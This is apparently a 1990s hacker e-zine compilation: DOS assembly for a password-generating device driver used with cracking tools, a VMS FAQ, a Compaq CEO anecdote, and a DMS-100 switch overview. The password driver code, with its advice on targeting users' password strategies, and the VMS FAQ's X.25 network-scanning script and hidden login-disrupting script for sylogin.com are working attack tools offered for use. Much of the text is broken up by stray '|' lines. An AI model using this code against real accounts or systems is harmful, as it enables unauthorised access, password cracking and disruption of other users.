This program would be very useful if you think you may know what strategy
|
||
the user/admin uses for picking out their passwords. Without eliciting some
|
||
sort of a strategy, forget it-- unless your desperate enough!!
|
||
|
||
|
||
A "strategy" could consist of any of these possible advantages--
|
||
|
||
1) default passwords (ie: SIN, student #, birth date, phone number...)
|
||
2) the mutation of a lUSERs' known password from another system
|
||
3) viewing the mark typing in most of their password with a couple
|
||
of unseen characters
|
||
4) etc...
|
||
|
||
---------------------------
|
||
With the sample device driver provided, passwords starting at
|
||
'aaaaaaa' and ending with 'zzzzzzz' will be generated. The length
|
||
of the password string can be modified by changing the length of
|
||
the password string itself (that is, the variable "number"). The
|
||
range of characters in the passwords can also be changed by
|
||
modifying the following two lines:
|
||
|
||
;hackdrv.sys
|
||
;.
|
||
;.
|
||
;
|
||
for ending character--
|
||
cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
|
||
|
||
...and for starting character
|
||
cmp byte ptr [number+si],'a' ;starting char. in range
|
||
;
|
||
;----------------------
|
||
|
||
for instance, if you wished to generate numbers from "0000000" to
|
||
"9999999"
|
||
|
||
-change the ending character to:
|
||
cmp byte ptr [number+si],'9'+1
|
||
|
||
-starting character to:
|
||
cmp byte ptr [number+si],'0'
|
||
|
||
and "number" variable from 'aaaaaa' to '0000000' and then
|
||
recompile..
|
||
|
||
-----
|
||
|
||
..or in the third case, if u had observed a lUSER type in most of
|
||
their password, you may want to rewrite the code to limit the
|
||
search. IE: limit the keys to a certain quadrant of the keyboard.
|
||
Modify the code starting at "reiterate:" and ending at "inc_num
|
||
endp" for this.
|
||
=================================================================
|
||
|
||
|
||
/'nuff of this!/ How do I get things working?
|
||
-----------------------------------------------
|
||
|
||
Compile the device driver "hackdrv.sys", and the second program,
|
||
"modpwd.asm". Then specify the device driver inside config.sys
|
||
(ie: "c:\hackdrv.sys"). The code below was compiled with the a86
|
||
compiler, v3.03. Some modifications might be needed to work with
|
||
other compilers.
|
||
|
||
To use it in prgs like crackerjack, type in the following on the
|
||
command line:
|
||
|
||
|
||
c:\>jack -pwfile:<your password file here!> -word:hackpwd
|
||
|
||
------
|
||
If you had stopped a cracker program (eg: crackerjack) and want to
|
||
pick up from where you left off, run the program "modpwd.com".
|
||
|
||
This program can change HACKDRVs password through-
|
||
|
||
a) a command line argument (ie: "modpwd aabbbbe")
|
||
b) executing the program with no parameters (this method also
|
||
displays the current password in memory)
|
||
|
||
|
||
|
||
Happy Hacking,
|
||
Uncle Armpit
|
||
|
||
;-----------------------cut here--------------------------------
|
||
;Program HACKDRV.SYS
|
||
;
|
||
org 0h
|
||
next_dev dd -1
|
||
attribute dw 0c000h ;character device w/ ioctl calls
|
||
strategy dw dev_strategy
|
||
interrupt dw dev_int
|
||
dev_name db 'HACKPWD '
|
||
countr dw offset number
|
||
number db 'aaaaaa',0ah ;<----six characters, lower case
|
||
numsize equ $-number - 2
|
||
afternum:
|
||
|
||
;working space for device driver
|
||
rh_ofs dw ?
|
||
rh_seg dw ?
|
||
|
||
dev_strategy: ;strategy routine
|
||
mov cs:rh_seg,es
|
||
mov cs:rh_ofs,bx
|
||
retf
|
||
|
||
dev_int: ;interrupt routine
|
||
pushf
|
||
push ds
|
||
push es
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push di
|
||
push si
|
||
|
||
cld
|
||
push cs
|
||
pop ds
|
||
|
||
mov bx,cs:rh_seg
|
||
mov es,bx
|
||
mov bx,cs:rh_ofs
|
||
|
||
mov al,es:[bx]+2
|
||
rol al,1
|
||
mov di,offset cmdtab
|
||
xor ah,ah
|
||
add di,ax
|
||
jmp word ptr[di]
|
||
|
||
|
||
cmdtab: ;command table
|
||
dw init ;0
|
||
dw exit3 ;1
|
||
dw exit3 ;2
|
||
dw ioctl_read ;3
|
||
dw do_read ;4
|
||
dw exit3 ;5
|
||
dw exit3 ;6
|
||
dw exit3 ;7
|
||
dw exit3 ;8
|
||
dw exit3 ;9
|
||
dw exit3 ;10
|
||
dw exit3 ;11
|
||
dw ioctl_write ;12
|
||
dw exit3 ;13
|
||
dw 5 dup (offset exit3)
|
||
|
||
|
||
|
||
ioctl_read:
|
||
push es
|
||
push bx
|
||
|
||
mov si,es:[bx+10h]
|
||
mov di,es:[bx+0eh]
|
||
mov es,si
|
||
|
||
push cs
|
||
pop ds
|
||
mov si,offset number
|
||
xor cx,cx
|
||
|
||
get_char:
|
||
lodsb
|
||
stosb
|
||
inc cl
|
||
cmp al,0ah
|
||
jz ioctl_rend
|
||
jmp get_char
|
||
|
||
ioctl_rend:
|
||
pop bx
|
||
pop es
|
||
mov es:[bx+012h],cx
|
||
mov cs:countr,offset number
|
||
jmp exit2
|
||
|
||
ioctl_write:
|
||
push es
|
||
push bx
|
||
mov si,es:[bx+010h]
|
||
mov ds,si
|
||
mov si,es:[bx+0eh]
|
||
mov cx,numsize+1 ;es:[bx+012h]
|
||
push cs
|
||
pop es
|
||
mov di,offset number
|
||
repe movsb
|
||
pop es
|
||
pop bx
|
||
mov cs:countr,offset number
|
||
jmp exit2
|
||
|
||
|
||
do_read:
|
||
push es
|
||
push bx
|
||
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
mov si,[countr]
|
||
inc si ;word ptr [countr]
|
||
cmp si,offset afternum
|
||
jnz is_okay
|
||
mov si,offset number
|
||
call inc_num
|
||
|
||
|
||
is_okay:
|
||
mov [countr],si
|
||
mov di,es:[bx]+0eh
|
||
mov ax,es:[bx]+010h
|
||
mov cx, es:[bx]+012h
|
||
jcxz clean_up
|
||
mov es,ax
|
||
repe movsb
|
||
|
||
clean_up:
|
||
pop bx
|
||
pop es
|
||
jmp exit2
|
||
|
||
|
||
exit3: mov es:word ptr 3[bx],08103h
|
||
jmp exit1
|
||
|
||
exit2:
|
||
mov es:word ptr 3[bx],0100h
|
||
|
||
exit1:
|
||
pop si
|
||
pop di
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
pop es
|
||
pop ds
|
||
popf
|
||
retf
|
||
exit:
|
||
|
||
inc_num proc near
|
||
push si
|
||
mov si,numsize
|
||
|
||
reiterate:
|
||
inc byte ptr [number+si]
|
||
cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
|
||
jnz _exit
|
||
mov byte ptr [number+si],'a' ;starting char. in range
|
||
dec si
|
||
cmp si,-1
|
||
jnz reiterate
|
||
mov byte ptr [number],01ah ;send EOF
|
||
_exit:
|
||
pop si
|
||
ret
|
||
inc_num endp
|
||
|
||
|
||
|
||
at_eof: ; the non-resident code starts here
|
||
|
||
initial proc near
|
||
push es
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
push cs
|
||
pop es
|
||
|
||
mov si,offset number
|
||
mov di,offset tmpnum
|
||
cld
|
||
_again:
|
||
lodsb
|
||
cmp al,0ah
|
||
jz _nomorechars
|
||
stosb
|
||
jmp _again
|
||
|
||
_nomorechars:
|
||
mov si,offset msgend
|
||
mov cx,4
|
||
repe movsb
|
||
|
||
mov ah,09 ;print welcome message
|
||
mov dx,offset msg1
|
||
int 21h
|
||
|
||
pop es
|
||
ret
|
||
initial endp
|
||
|
||
init: call initial
|
||
mov ax,offset at_eof
|
||
mov es:[bx]+0eh,ax
|
||
push cs
|
||
pop ax
|
||
mov es:[bx]+010h,ax
|
||
mov cs:word ptr cmdtab,offset exit3
|
||
jmp exit2
|
||
|
||
|
||
msg1 db "Incremental Password Generator (c)1995",0ah,0dh
|
||
db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
|
||
db "Starting at word ["
|
||
tmpnum db 10 dup (?)
|
||
msgend db "]",0a,0d,'$'
|
||
;END hackdrv.sys
|
||
|
||
;------------------------------cut here----------------------------------
|
||
|
||
;PROGRAM modpwd.asm
|
||
;
|
||
org 0100h
|
||
mov ax,03d02h
|
||
xor cx,cx
|
||
mov dx,offset devname
|
||
int 21h
|
||
jnc drvr_found
|
||
|
||
mov ah,09
|
||
mov dx,offset no_drvr
|
||
int 21h
|
||
jmp error_pass
|
||
|
||
|
||
drvr_found:
|
||
mov bx,ax
|
||
mov ax,04402h
|
||
mov cx,20 ;read 20 characters
|
||
mov dx,offset databuffr
|
||
int 21h
|
||
|
||
mov pass_len,al
|
||
dec al
|
||
mov ah,al
|
||
and al,0fh
|
||
mov cl,4
|
||
shr ah,cl
|
||
add ax,03030h
|
||
cmp al,'9'
|
||
jbe inrange
|
||
add al,7
|
||
inrange:
|
||
cmp ah,'9'
|
||
jbe inrange1
|
||
add ah,7
|
||
inrange1:
|
||
mov byte ptr [num_chr],ah
|
||
mov byte ptr [num_chr+1],al
|
||
|
||
|
||
cld
|
||
mov di,offset databuffr-1
|
||
xor cx,cx
|
||
mov cl,pass_len
|
||
add di,cx
|
||
mov si,offset pass_end
|
||
mov cx,stringsz
|
||
repe movsb
|
||
|
||
;check for information in command line
|
||
;else--> prompt for user input
|
||
mov al,pass_len
|
||
or byte ptr [0080h],0
|
||
jz req_input
|
||
mov cl,[0080h]
|
||
dec cl
|
||
mov [0081h],cl
|
||
mov si,0081h
|
||
mov di,offset newpass
|
||
mov cx,20
|
||
repe movsb
|
||
jmp vrfy_info
|
||
|
||
req_input:
|
||
mov ah,09
|
||
mov dx,offset cur_pass
|
||
int 21h
|
||
|
||
mov ah,0a
|
||
mov dx,offset pass_len
|
||
int 21h
|
||
|
||
|
||
vrfy_info:
|
||
mov ax,word ptr [pass_len]
|
||
cmp ah,0
|
||
jz error_pass
|
||
dec al
|
||
cmp ah,al
|
||
jnz error_len
|
||
|
||
;change the current password
|
||
xor cx,cx
|
||
mov cl,al
|
||
mov ah,044h
|
||
mov al,03
|
||
mov dx,offset newpass+1
|
||
int 21h
|
||
jnc success_pass
|
||
|
||
error_len:
|
||
mov ah,09
|
||
mov dx,offset errormsg
|
||
int 21h
|
||
|
||
error_pass:
|
||
mov ax,04c01h ;abnormal termination
|
||
int 21h
|
||
|
||
success_pass:
|
||
mov ax,04c00h
|
||
int 21h
|
||
|
||
|
||
devhandle dw ?
|
||
cur_pass db 'Current password is ['
|
||
databuffr db 20 dup (?)
|
||
pass_end db '] ;'
|
||
num_chr db ' '
|
||
db ' characters',0ah,0dh,0ah,0dh
|
||
prompt db 'New word: ','$'
|
||
stringsz equ $ - pass_end
|
||
|
||
pass_len db 00
|
||
newpass db 20 dup (?)
|
||
errormsg db 'error changing password!',0ah,0dh,'$'
|
||
no_drvr db 'Error: '
|
||
devname db "HACKPWD ",00
|
||
db 'device driver not loaded!',0ah,0dh,07,'$'
|
||
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
-- Frequently & Rarely asked questions about VMS -- part one
|
||
by Opticon the Disassembled - UPi
|
||
|
||
[1]
|
||
|
||
" I have a kropotkin.hlp file. What could I possibly do with it ? "
|
||
|
||
$ library /insert /help sys$help:helplib.hlb kropotkin.hlp
|
||
.
|
||
.
|
||
.
|
||
$ help kropotkin
|
||
|
||
[2]
|
||
|
||
" I have a bakunin.tlb file. What to do with it ? "
|
||
|
||
$ library /extract=(*) bakunin.tlb
|
||
.
|
||
.
|
||
.
|
||
$ dir
|
||
|
||
[3]
|
||
|
||
" I would like to have a look at prunton.dat. "
|
||
|
||
$ dump [/block=(count:x)] prunton.dat
|
||
|
||
Where "x" is the number of blocks DUMP will display.
|
||
|
||
[4]
|
||
|
||
" How can I use an external editor with mail ? "
|
||
|
||
$ mail :== mail /edit=(send,reply=extract,forward)
|
||
|
||
[5]
|
||
|
||
" How a HELP file is organized ? "
|
||
|
||
$ create example.hlp
|
||
1 EXAMPLE
|
||
|
||
THIS IS AN EXAMPLE.
|
||
|
||
2 MORE_EXAMPLES
|
||
|
||
MORE EXAMPLES.
|
||
|
||
3 EVEN_MORE_EXAMPLES
|
||
|
||
EVEN MORE EXAMPLES.
|
||
<CTRL-Z>
|
||
|
||
[6]
|
||
|
||
" How can I have a look at queues ? "
|
||
|
||
$ show queue smtp /all/full
|
||
|
||
or
|
||
|
||
$ show queue /batch/all/full
|
||
|
||
or
|
||
|
||
$ show queue /all/full
|
||
|
||
[7]
|
||
|
||
" My mail is holded, for some reason, in the SMTP queue... "
|
||
|
||
Either
|
||
|
||
$ delete /entry=XXX
|
||
|
||
or
|
||
|
||
$ set entry XXX /release
|
||
|
||
in order to force VMS to release it right away.
|
||
|
||
[8]
|
||
|
||
" How do I have a look at DTE and circuits available. "
|
||
|
||
$ mc ncp show known dte
|
||
|
||
and
|
||
|
||
$ mc ncp show known circuits
|
||
|
||
You may also may find of interest:
|
||
|
||
$ mc ncp show known networks
|
||
|
||
$ mc ncp show known lines
|
||
|
||
$ mc ncp show known destinations
|
||
|
||
[9]
|
||
|
||
" I need a NUA scanner for VMS. "
|
||
|
||
$ OPEN/READ VALUES SCAN.VAL
|
||
$ READ VALUES PRE
|
||
$ READ VALUES DTE
|
||
$ READ VALUES END
|
||
$ CLOSE VALUES
|
||
$ LOG = "SCAN.LIS"
|
||
$ TMP = "SCAN.TMP"
|
||
$ OPEN/WRITE FILE 'LOG
|
||
$ WRITE FILE "PREFIX:",PRE
|
||
$ WRITE FILE "START :",DTE
|
||
$ WRITE FILE "LAST :",END
|
||
$LOOP:
|
||
$ ON ERROR THEN GOTO OPEN
|
||
$ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE'
|
||
$ WAIT 00:00:06
|
||
$ SPAWN_NAME = F$GETJPI("","USERNAME")
|
||
$ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_"
|
||
$ CONTEXT = ""
|
||
$FIND_PROC:
|
||
$ PID = F$PID(CONTEXT)
|
||
$ IF PID .EQS. "" THEN GOTO OPEN
|
||
$ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID
|
||
$ GOTO FIND_PROC
|
||
$OPEN:
|
||
$ ON ERROR THEN GOTO OPEN
|
||
$ OPEN/READ PAD 'TMP
|
||
$ MSSG = " Process stopped"
|
||
$ ON ERROR THEN GOTO CLOSE
|
||
$ READ PAD LINE
|
||
$ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE
|
||
$ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE)
|
||
$CLOSE:
|
||
$ CLOSE PAD
|
||
$ DELETE 'TMP';*
|
||
$ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN
|
||
$ WRITE FILE PRE,DTE,MSSG
|
||
$NOCONN:
|
||
$ DTE = DTE + 1
|
||
$ IF DTE .LE. END THEN GOTO LOOP
|
||
$ CLOSE FILE
|
||
|
||
( I don't have a clue by whom the code was written. )
|
||
|
||
then
|
||
|
||
$ create scan.val
|
||
prefix
|
||
starting_NUA
|
||
ending_NUA
|
||
<CTRL-Z>
|
||
$ submit /noprint scan.com
|
||
.
|
||
.
|
||
.
|
||
$ search scan.lis "call connected"
|
||
|
||
[10]
|
||
|
||
" How do I crash a VAX !? "
|
||
|
||
$ set default sys$system
|
||
$ @shutdown
|
||
|
||
or
|
||
|
||
$ set default sys$system
|
||
$ run opccrash
|
||
|
||
[11]
|
||
|
||
" I have a dostogiefski.cld file; what do I do with it ? "
|
||
|
||
$ set command dostogiefski.cld
|
||
|
||
[12]
|
||
|
||
" Can I send messages to interactive processes ? "
|
||
|
||
$ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella "
|
||
|
||
[13]
|
||
|
||
" How can I prevent someone from phoning me all the time ? "
|
||
|
||
$ set broadcast=(nophone)
|
||
|
||
[14]
|
||
|
||
" Can I postpone/disable interactive logins ? "
|
||
|
||
$ set logins /interactive=0
|
||
|
||
$ set logins /interactive
|
||
|
||
will display current value.
|
||
|
||
Under the same `logic' :
|
||
|
||
$ create innocent_filename.com
|
||
$ set nocontrol
|
||
$ context = ""
|
||
$ pid = F$PID(context)
|
||
$ user_name = F$GETJPI(pid,"username")
|
||
$ wait 00:01:00.00
|
||
$ write sys$output ""
|
||
$ write sys$output " System overloaded; please try again later "
|
||
$ write sys$output " Logging out process ''pid', of user ''user_name' "
|
||
$ write sys$output ""
|
||
$ logout /full
|
||
|
||
Add either to sys$system:sylogin.com or sys$login:login.com the following:
|
||
" $ @innocent_filename.com ".
|
||
|
||
[15]
|
||
|
||
" How can I modify the welcome file ? Where is it held ? "
|
||
|
||
$ set default sys$system
|
||
$ edit welcome.txt
|
||
|
||
[16]
|
||
|
||
" I am editing a huge text file. How can I reach the end of it ? "
|
||
|
||
at the editor's prompt type:
|
||
|
||
*find end
|
||
|
||
or
|
||
|
||
*find "search string"
|
||
|
||
[17]
|
||
|
||
" How can I be sure than noone is watching me from a hidden process ? "
|
||
|
||
$ show system /process
|
||
VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:41.94 Uptime 2 03:05:25
|
||
Pid Process Name State Pri I/O CPU Page flts Ph.Mem
|
||
.
|
||
.
|
||
.
|
||
00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47
|
||
00000117 SMTP_SYMBIONT HIB 4 33398 0 00:16:49.67 246104 426
|
||
00000118 SYMBIONT_6 HIB 4 47868 0 00:05:09.01 296 121
|
||
00001255 SYMBIONT_0001 CUR 13 15 64293 0 00:05:08.12 1982 248
|
||
|
||
$ show system /full
|
||
|
||
VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:59.64 Uptime 2 03:05:43
|
||
Pid Process Name State Pri I/O CPU Page flts Ph.Mem
|
||
.
|
||
.
|
||
.
|
||
00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47
|
||
[1,4]
|
||
00000117 SMTP_SYMBIONT LEF 5 33407 0 00:16:49.78 246116 502
|
||
[1,4]
|
||
00000118 SYMBIONT_6 HIB 5 47872 0 00:05:09.03 296 121
|
||
[1,4]
|
||
00001255 SYMBIONT_0001 CUR 13 15 64348 0 00:05:09.60 2063 268
|
||
[1,4]
|
||
$
|
||
|
||
See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4,
|
||
SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program
|
||
( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but
|
||
state, priority, physical memory used, page faults, input/output and Process
|
||
IDentification numbers, can reveal, in combination, such a nastyness.
|
||
|
||
Afterwards you may " show process /id=xxxx /continuous ",
|
||
or " stop /id=xxxx ".
|
||
|
||
[18]
|
||
|
||
" Can I view the CPU usage of each process ? "
|
||
|
||
$ monitor processes /topcpu
|
||
|
||
will display a bar-chart of this kind.
|
||
|
||
[19]
|
||
|
||
Run the following .COM file and it will display information you'd
|
||
possibly need on an account and/or node. It uses simple lexical functions.
|
||
|
||
$ output :== write sys$output
|
||
$ output ""
|
||
$ node_id = F$CSID(context)
|
||
$ nodename = F$GETSYI("nodename",,node_id)
|
||
$ if F$GETSYI("cluster_member") .EQS. "TRUE"
|
||
$ then output " ''nodename' is a member of a cluster. "
|
||
$ else output " ''nodename' is not a member of a cluster. "
|
||
$ context = ""
|
||
$ username = F$GETJPI("","username")
|
||
$ output " Username : ''username' "
|
||
$ group = F$GETJPI("","grp")
|
||
$ output " Group : ''group' "
|
||
$ uic = F$USER()
|
||
$ output " User Identification Code : ''uic' "
|
||
$ pid = F$PID(context)
|
||
$ output " Process IDentification : ''pid' "
|
||
$ process = F$PROCESS()
|
||
$ output " Process Name : ''process' "
|
||
$ terminal = F$GETJPI("","terminal")
|
||
$ output " Terminal Name : ''terminal' "
|
||
$ priority = F$GETJPI("","authpri")
|
||
$ output " Authorized Priority : ''priority' "
|
||
$ maxjobs = F$GETJPI("","maxjobs")
|
||
$ output " Maximum Number of Processes Allowed : ''maxjobs' "
|
||
$ authpriv = F$GETJPI("","authpriv")
|
||
$ output " Authorized Privileges : ''authpriv' "
|
||
$ curpriv = F$GETJPI("","curpriv")
|
||
$ output " Current Privileges : ''curpriv' "
|
||
$ directory = F$DIRECTORY()
|
||
$ output " Directory : ''directory' "
|
||
$ protection = F$ENVIRONMENT("protection")
|
||
$ output " Protection : ''protection' "
|
||
$ boottime = F$GETSYI("boottime")
|
||
$ output " Boot Time : ''boottime' "
|
||
$ time = F$TIME()
|
||
$ output " Current Time : ''time' "
|
||
$ version = F$GETSYI("version")
|
||
$ output " VMS version : ''version' "
|
||
$ output ""
|
||
|
||
You may :
|
||
|
||
$ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb
|
||
|
||
and then transfer lexicals.hlp.
|
||
|
||
[20]
|
||
|
||
" How can I view/modify my disk quota limit ? "
|
||
|
||
DiskQuota was a standalone utility in versions prior to five; It is now
|
||
a subset of the System Management utility, and thus you should :
|
||
|
||
$ set def sys$system
|
||
$ run sysman
|
||
SYSMAN> diskquota show /device=dua1: [1,1]
|
||
%SYSMAN-I-QUOTA, disk quota statistics on device DUA1: --
|
||
Node
|
||
UIC Usage Permanent Quota Overdraft Limit
|
||
[1,1] 123456 1500000 100
|
||
|
||
SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000
|
||
|
||
[END]
|
||
|
||
Post Scriptum
|
||
|
||
Some operations require privileges.
|
||
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
Compaq CEO blunders on TV
|
||
|
||
Compaq CEO Eckard Pfeiffer last week visited The Netherlands
|
||
to do some pr work. During a television interview for NOVA,
|
||
a well known news show that aired last Friday, Pfeiffer
|
||
claimed that pc's were easy to use, and could be used by
|
||
virtually anyone. So, the reporter asked him to switch the
|
||
tv channel on a Presario that was next to Pfeiffer that ran
|
||
a Windows-based TV tuner. The result was Pfeifer frantically
|
||
clicking on several menu bars, but instead of switching
|
||
channels, he exited the program altogether. To make things
|
||
worse, the reporter next asked him to start up a word
|
||
processor. Again, Pfeiffer, clicked his way around the
|
||
desktop, but couldn't find nor start the program. Finally,
|
||
he was asked to start up a game. You saw Pfeifer (now in
|
||
deep trouble) clicking on all the tabs of the "easy to use"
|
||
tab-works interface that is included on all Presario's,
|
||
looking for games, while muttering "Were are ze games? I
|
||
can't find ze games on zis machine!!!", his accent becoming
|
||
increasingly more German then before. It was almost like Dr.
|
||
Strangelove. The last shot is of a Compaq tech support guy,
|
||
rushing in to help him out.... So much for ease of use....
|
||
|
||
Voorburgwal 129, 1012 EP
|
||
Amsterdam, The Netherlands).
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
Ok, I'm going to assume that you already know a little bit about what it
|
||
is you're reading. The DMS100/IBN (integrated business network) is
|
||
composed of mainly electronic business sets, phones, data units, and
|
||
attendant consoles and units, all physically at the customers place of
|
||
business. While the digital switching software and support hardware is
|
||
located at the Telco. Together, in tandem they work to give the customer
|
||
one of the best combinations of features and benefits. The DMS-100
|
||
combines voice AND data in one business comunications package. One of
|
||
the many advantages is it offers the use with *any* sized business with
|
||
up to 30,000 lines. The IBN system controls most operations, diagnoses
|
||
problems, and also has the ability to do limited repairs on itself.
|
||
Being modular, it can meet the needs at hand, and have the ability for
|
||
new features, as time goes by, while still maintaining a cost-effective
|
||
environment. Another advantage is that is uses a central attendant where
|
||
and when needed. Along with Call Routing, or CDR, to control and
|
||
restrict Long Distnace Calling, and network management. The IBN gives
|
||
the user hassle free operation. Northern Telcom's DMS-100 switches,
|
||
which by the way are digital, are frequently backed-up by their
|
||
*higher trained* personnel, which isnt saying much. Some other features
|
||
are: Automatic Routing Selection, or ARS, which routes the long distance
|
||
calls, if they are even allowed, over the most economical (right) route
|
||
available. Station Message Detail Recording, or SMDR, which basically
|
||
does just what its name states, records long distance charges, including
|
||
but not limited to, originating number, time and length of call,
|
||
authorization code, and others... Yet another capability is the Direct
|
||
Inward System Access (DISA), which gives the personnel the ability to use
|
||
the system to place long distance calls cheaply, even from outside the
|
||
company (sounds like a PBX a bit doesn't it?).
|
||
System Features and Benefits: There are 6 Call Waiting Lamp Loop Keys,
|
||
each with its associated source AND destination lamp to signify the
|
||
status of both the calling and the called party status. The Second
|
||
feature is Alpha Numeric Display Multiple Directory Number Feature Keys,
|
||
up to 42 of them, which can be used for a Paging System, or speed
|
||
dialing, and things along those lines. A third feature is the release
|
||
Source/Release Destination Console, which features access to paging.
|
||
Other features which mainly are unimportant I will list here, they are:
|
||
Call Identifier Exclude Source/Exclude Destination. Remote Console Call
|
||
Destination. Signal Source.Signal Destination. Call Holding. Call
|
||
Detail Entry. Remote Console Call Selection. Console Display. Camp-on
|
||
Automatic Recall Conference. A 6 port 2 way splitting non-delayed
|
||
operation. Busy Verification of Lines. Manual and Automatic Hold.
|
||
Multiple Console OPeration. Busy verification of trunks. Switched Loop
|
||
Operation. Trunk Group Busy Indication. Uniform Call distribution form
|
||
queue. Multiple listed directory numbers. Control of trunk group
|
||
access. Secrecy. Night Service. Serial call. Speed Calling. Lockout.
|
||
Delayed Operation. Position Busy. Interposition Calling. THrough Call
|
||
Pickup. RIng Again. Multiple Directory Numbers. Intercom. Speed
|
||
Call. Call Transfer/Conference. On-Hook Dialing. Additional
|
||
Programmable Features include automatic hold. Listem-on hold. Multiple
|
||
Appearance Directory Numbers, or MADN. Single Call Arrangement.
|
||
Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume
|
||
Control. Call Waiting. Stored Number Redial. Private Business Line.
|
||
And Finally a 32 character alphanumeric data unit. The DMS100/IBN can be
|
||
used as a "standalone" or can be attached to the business set or other
|
||
phone type unit. It has the ability to transmit over a two wire loop, at
|
||
speeds of up to 56 kb per second, using a proprietary time compression
|
||
multiplexing technology. The DMS100 is also available in different
|
||
models to suit existing terminal capacities. It also provides integrated
|
||
voice/data, that right data, communications. They, the phone company,
|
||
and data unit, can operate together, simultaniously, or even independant
|
||
of one another. Being fully digitized, it was one if the first switches
|
||
to eliminate the use of those dinosaur analog modems (for which i still
|
||
have a few if anyone wants to buy em off me or give me shipping money and
|
||
ill send em to ya free). Well thats it for now. This should give you a
|
||
good understanding of the capabilities of one of the many switches in use
|
||
today. In fact, although outdated somewhat, my telco, citizens
|
||
utilities, and one in stockton from what i just found out, is still using
|
||
this switch (poor me in elk grove, ca eh?)
|
||
which makes phreaking quite an easy task, not that it was really ever
|
||
hard but anything to make it easier help. ANyway, if you have any
|
||
comments/flames/general bullshit, mail it to either
|
||
jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a
|
||
last resort email address.
|
||
ciao
|
||
---Captain Hook
|
||
|
||
------------------------------------------------------------------------------ |